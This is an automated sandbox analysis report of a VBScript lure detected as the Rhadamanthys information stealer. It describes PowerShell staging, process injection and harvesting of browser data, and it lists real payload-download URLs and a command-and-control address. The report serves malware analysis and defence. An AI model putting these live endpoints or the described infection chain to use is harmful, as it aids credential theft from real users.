                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\f0479a66-61f1-42d6-a1ab-d023ed0adaa0
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browser
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\settings\main\ms-language-packs\browser\newtab
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\ff366d85-2475-4dfc-a5c6-01e0d6f59500
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOY

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 00000018.00000003.2899852769.0000000003780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.2910076907.0000000023BA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000017.00000003.2895832685.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000018.00000002.2999474579.0000000003820000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A959B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,25_3_00007DF415A959B0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446541D004 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,32_2_000002446541D004
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information211
                        Scripting
                        Valid Accounts11
                        Windows Management Instrumentation
                        211
                        Scripting
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        1
                        OS Credential Dumping
                        13
                        File and Directory Discovery
                        Remote Services1
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution
                        1
                        DLL Side-Loading
                        512
                        Process Injection
                        2
                        Obfuscated Files or Information
                        11
                        Input Capture
                        225
                        System Information Discovery
                        Remote Desktop Protocol11
                        Data from Local System
                        21
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter
                        1
                        Create Account
                        Logon Script (Windows)2
                        Software Packing
                        Security Account Manager221
                        Security Software Discovery
                        SMB/Windows Admin Shares11
                        Input Capture
                        1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts3
                        PowerShell
                        Login HookLogin Hook1
                        DLL Side-Loading
                        NTDS141
                        Virtualization/Sandbox Evasion
                        Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                        Masquerading
                        LSA Secrets2
                        Process Discovery
                        SSHKeylogging3
                        Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                        Virtualization/Sandbox Evasion
                        Cached Domain Credentials1
                        Application Window Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items512
                        Process Injection
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568995 Sample: List of Required items xlsx.vbs Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 73 www.tdejb.com 2->73 75 www.pts.group 2->75 77 11 other IPs or domains 2->77 105 Suricata IDS alerts for network traffic 2->105 107 Malicious sample detected (through community Yara rule) 2->107 109 Yara detected RHADAMANTHYS Stealer 2->109 111 11 other signatures 2->111 11 wscript.exe 1 2->11         started        14 powershell.exe 15 2->14         started        16 svchost.exe 2->16         started        signatures3 process4 dnsIp5 125 VBScript performs obfuscated calls to suspicious functions 11->125 127 Suspicious powershell command line found 11->127 129 Wscript starts Powershell (via cmd or directly) 11->129 139 3 other signatures 11->139 19 powershell.exe 20 19 11->19         started        131 Early bird code injection technique detected 14->131 133 Writes to foreign memory regions 14->133 135 Found suspicious powershell code related to unpacking or dynamic code loading 14->135 137 Queues an APC in another process (thread injection) 14->137 24 msiexec.exe 14->24         started        26 conhost.exe 14->26         started        71 127.0.0.1 unknown unknown 16->71 signatures6 process7 dnsIp8 79 fornid.com 93.95.216.175, 443, 49789 SERVERPLAN-ASIT Italy 19->79 81 pts.group 68.66.226.116, 443, 49729, 49748 A2HOSTINGUS United States 19->81 67 C:\Users\Public\ilurgw960k7fwnm.xlsx, Microsoft 19->67 dropped 69 C:\Users\Public\grm2bfvsa42.vbs, ASCII 19->69 dropped 117 Found suspicious powershell code related to unpacking or dynamic code loading 19->117 28 wscript.exe 1 19->28         started        31 EXCEL.EXE 72 74 19->31         started        34 conhost.exe 19->34         started        83 tdejb.com 202.71.109.228, 443, 49887 TMVADS-APTM-VADSDCHostingMY Malaysia 24->83 119 Switches to a custom stack to bypass stack traces 24->119 36 svchost.exe 24->36         started        file9 signatures10 process11 dnsIp12 141 Suspicious powershell command line found 28->141 143 Wscript starts Powershell (via cmd or directly) 28->143 145 Encrypted powershell cmdline option found 28->145 38 WMIC.exe 1 28->38         started        41 powershell.exe 18 28->41         started        99 13.107.246.63, 443, 49718, 49719 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 31->99 101 s-0005.s-dc-msedge.net 52.113.195.132, 443, 49814 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 31->101 43 splwow64.exe 31->43         started        103 45.149.241.141, 2023, 49912 UUNETUS Germany 36->103 147 System process connects to network (likely due to code injection or exploit) 36->147 149 Switches to a custom stack to bypass stack traces 36->149 45 svchost.exe 36->45         started        signatures13 process14 dnsIp15 121 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 38->121 48 conhost.exe 38->48         started        50 conhost.exe 41->50         started        87 ntp.time.nl 94.198.159.10 SIDNNL Netherlands 45->87 89 ntp1.hetzner.de 213.239.239.164 HETZNER-ASDE Germany 45->89 91 4 other IPs or domains 45->91 123 Tries to harvest and steal browser information (history, passwords, etc) 45->123 52 wmpnscfg.exe 45->52         started        55 msedge.exe 45->55         started        57 chrome.exe 45->57         started        signatures16 process17 dnsIp18 113 Writes to foreign memory regions 52->113 115 Allocates memory in foreign processes 52->115 60 dllhost.exe 52->60         started        62 msedge.exe 55->62         started        85 239.255.255.250 unknown Reserved 57->85 65 chrome.exe 57->65         started        signatures19 process20 dnsIp21 93 b-0005.b-dc-msedge.net 13.107.9.158 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 62->93 95 162.159.61.3 CLOUDFLARENETUS United States 62->95 97 chrome.cloudflare-dns.com 172.64.41.3 CLOUDFLARENETUS United States 62->97

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        List of Required items xlsx.vbs0%ReversingLabs
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://www.fornid.com0%Avira URL Cloudsafe
                        https://pts.group/ab/Laney.dsp0%Avira URL Cloudsafe
                        https://www.fornid.com0%Avira URL Cloudsafe
                        https://go.micro0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.bin0%Avira URL Cloudsafe
                        http://crl.microsoft~0%Avira URL Cloudsafe
                        https://www.pts.group/ab/ab.vbs0%Avira URL Cloudsafe
                        https://www.puneet.ae/ab/Laney.dsp0%Avira URL Cloudsafe
                        http://pts.group0%Avira URL Cloudsafe
                        https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22gl0%Avira URL Cloudsafe
                        http://www.pts.group0%Avira URL Cloudsafe
                        https://www.pts.group0%Avira URL Cloudsafe
                        https://pts.group0%Avira URL Cloudsafe
                        https://www.fornid.com/ab/List%20of%20required%20items.xlsx0%Avira URL Cloudsafe
                        https://www.fornid.com/ab/List0%Avira URL Cloudsafe
                        http://fornid.com0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        time.cloudflare.com
                        162.159.200.123
                        truefalse
                          high
                          chrome.cloudflare-dns.com
                          172.64.41.3
                          truefalse
                            high
                            time.google.com
                            216.239.35.12
                            truefalse
                              high
                              pts.group
                              68.66.226.116
                              truetrue
                                unknown
                                tdejb.com
                                202.71.109.228
                                truefalse
                                  unknown
                                  b-0005.b-dc-msedge.net
                                  13.107.9.158
                                  truefalse
                                    high
                                    fp2e7a.wpc.phicdn.net
                                    192.229.221.95
                                    truefalse
                                      high
                                      fornid.com
                                      93.95.216.175
                                      truetrue
                                        unknown
                                        s-0005.s-dc-msedge.net
                                        52.113.195.132
                                        truefalse
                                          high
                                          ntp.time.nl
                                          94.198.159.10
                                          truefalse
                                            high
                                            ntp.time.in.ua
                                            62.149.0.30
                                            truefalse
                                              high
                                              time.facebook.com
                                              129.134.25.123
                                              truefalse
                                                high
                                                ntp1.hetzner.de
                                                213.239.239.164
                                                truefalse
                                                  unknown
                                                  www.fornid.com
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.pts.group
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      www.tdejb.com
                                                      unknown
                                                      unknowntrue
                                                        unknown
                                                        NameMaliciousAntivirus DetectionReputation
                                                        https://www.pts.group/ab/ab.vbstrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://pts.group/ab/Laney.dspfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.tdejb.com/ab/ab.binfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.fornid.com/ab/List%20of%20required%20items.xlsxtrue
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.3648154582.00000297E0EE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3505876743.00000297D2770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3648154582.00000297E0DAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2419519112.00000157DC9B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000A.00000002.2392651911.00000157CCB65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000A.00000002.2392651911.00000157CCB65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://go.micropowershell.exe, 00000002.00000002.3505876743.00000297D195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CD4F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://crl.microsoft~powershell.exe, 0000000A.00000002.2391880163.00000157CAC64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://contoso.com/Licensepowershell.exe, 0000000A.00000002.2419519112.00000157DC9B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://contoso.com/Iconpowershell.exe, 0000000A.00000002.2419519112.00000157DC9B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.fornid.compowershell.exe, 00000002.00000002.3505876743.00000297D2344000.00000004.00000800.00020000.00000000.sdmptrue
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://pts.grouppowershell.exe, 00000002.00000002.3505876743.00000297D2315000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CE5AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000A.00000002.2392651911.00000157CCB65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.fornid.compowershell.exe, 00000002.00000002.3505876743.00000297D26EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22glsvchost.exefalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.puneet.ae/ab/Laney.dsppowershell.exe, 0000000A.00000002.2392651911.00000157CE0E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CCB65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2677840945.0000000005025000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.pts.grouppowershell.exe, 00000002.00000002.3505876743.00000297D195D000.00000004.00000800.00020000.00000000.sdmptrue
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://aka.ms/pscore6lBpowershell.exe, 00000010.00000002.2677840945.0000000004ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contoso.com/powershell.exe, 0000000A.00000002.2419519112.00000157DC9B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.3648154582.00000297E0EE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3505876743.00000297D2770000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.3648154582.00000297E0DAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2419519112.00000157DC9B3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.fornid.com/ab/Listpowershell.exe, 00000002.00000002.3505876743.00000297D2344000.00000004.00000800.00020000.00000000.sdmptrue
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.3505876743.00000297D0D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CC941000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.3505876743.00000297D0D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CC941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2677840945.0000000004ED1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.pts.grouppowershell.exe, 00000002.00000002.3505876743.00000297D2315000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://pts.grouppowershell.exe, 0000000A.00000002.2392651911.00000157CE5A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2392651911.00000157CCB65000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://fornid.compowershell.exe, 00000002.00000002.3505876743.00000297D26EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs
                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              94.198.159.10
                                                                              ntp.time.nlNetherlands
                                                                              1140SIDNNLfalse
                                                                              13.107.246.63
                                                                              unknownUnited States
                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              129.134.25.123
                                                                              time.facebook.comUnited States
                                                                              32934FACEBOOKUSfalse
                                                                              162.159.200.123
                                                                              time.cloudflare.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              68.66.226.116
                                                                              pts.groupUnited States
                                                                              55293A2HOSTINGUStrue
                                                                              162.159.61.3
                                                                              unknownUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              202.71.109.228
                                                                              tdejb.comMalaysia
                                                                              17971TMVADS-APTM-VADSDCHostingMYfalse
                                                                              172.64.41.3
                                                                              chrome.cloudflare-dns.comUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              13.107.9.158
                                                                              b-0005.b-dc-msedge.netUnited States
                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              213.239.239.164
                                                                              ntp1.hetzner.deGermany
                                                                              24940HETZNER-ASDEfalse
                                                                              62.149.0.30
                                                                              ntp.time.in.uaUkraine
                                                                              15497COLOCALLInternetDataCenterColoCALLUAfalse
                                                                              216.239.35.12
                                                                              time.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              45.149.241.141
                                                                              unknownGermany
                                                                              701UUNETUStrue
                                                                              52.113.195.132
                                                                              s-0005.s-dc-msedge.netUnited States
                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              239.255.255.250
                                                                              unknownReserved
                                                                              unknownunknownfalse
                                                                              93.95.216.175
                                                                              fornid.comItaly
                                                                              52030SERVERPLAN-ASITtrue
                                                                              IP
                                                                              127.0.0.1
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1568995
                                                                              Start date and time:2024-12-05 10:37:08 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 11m 38s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:34
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:List of Required items xlsx.vbs
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.expl.evad.winVBS@51/124@15/17
                                                                              EGA Information:
                                                                              • Successful, ratio: 28.6%
                                                                              HCA Information:
                                                                              • Successful, ratio: 62%
                                                                              • Number of executed functions: 188
                                                                              • Number of non-executed functions: 9
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .vbs
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.28.47, 23.218.208.109, 52.178.17.235, 17.253.18.99, 17.253.18.131, 17.253.14.125, 212.138.170.134, 172.217.21.35, 64.233.161.84, 172.217.17.46, 13.107.42.16, 204.79.197.239, 13.107.21.239
                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, tse1.mm.bing.net, clientservices.googleapis.com, fs-wildcard.microsoft.com.edgekey.net, clients2.google.com, ocsp.digicert.com, config-edge-skype.l-0007.l-msedge.net, e16604.g.akamaiedge.net, officeclient.microsoft.com, l-0007.l-msedge.net, www.bing.com, ecs.office.com, pool.ntp.org, fs.microsoft.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, business-bing-com.b-0005.b-msedge.net, ris.api.iris.microsoft.com, uks-azsc-000.roaming.officeapps.live.com, ecs.office.trafficmanager.net, clients.l.google.com, europe.configsvc1.live.com.akadns.net, config.edge.skype.com.trafficmanager.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.edge.digicert.com, time.g.aaplimg.com, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, self-events-data.trafficmanager.net, edge-microsoft-com.dual-a-003
                                                                              • Execution Graph export aborted for target msiexec.exe, PID 7660 because there are no executed function
                                                                              • Execution Graph export aborted for target powershell.exe, PID 416 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 7352 because it is empty
                                                                              • Execution Graph export aborted for target powershell.exe, PID 7832 because it is empty
                                                                              • Execution Graph export aborted for target svchost.exe, PID 3992 because there are no executed function
                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size exceeded maximum capacity and may have missing network information.
                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: List of Required items xlsx.vbs
                                                                              TimeTypeDescription
                                                                              04:38:11API Interceptor3291591x Sleep call for process: powershell.exe modified
                                                                              04:38:17API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                              04:38:40API Interceptor2x Sleep call for process: svchost.exe modified
                                                                              04:39:43API Interceptor1x Sleep call for process: splwow64.exe modified
                                                                              04:40:06API Interceptor1x Sleep call for process: wmpnscfg.exe modified
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              94.198.159.10download.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                162.159.61.3my2gf4tNEk.exeGet hashmaliciousUnknownBrowse
                                                                                  17333253674c71ac3d5875ca830e11f4630bf65d3b8b7e2686361e216df980d330c80afb30623.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                    sF5nNt8usL.batGet hashmaliciousUnknownBrowse
                                                                                      oLY6JbNl9i.batGet hashmaliciousUnknownBrowse
                                                                                        9aTcxCmLgM.batGet hashmaliciousUnknownBrowse
                                                                                          4l5IFxl9t3.batGet hashmaliciousUnknownBrowse
                                                                                            Readme.lnk.download.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              098aPtSbmd.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                loader.ps1.batGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                  Documenti relativi alla violazione dei diritti di propriet#U00e0 intellettuale.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                    13.107.246.63Contract Proposal Documents.pdfGet hashmaliciousUnknownBrowse
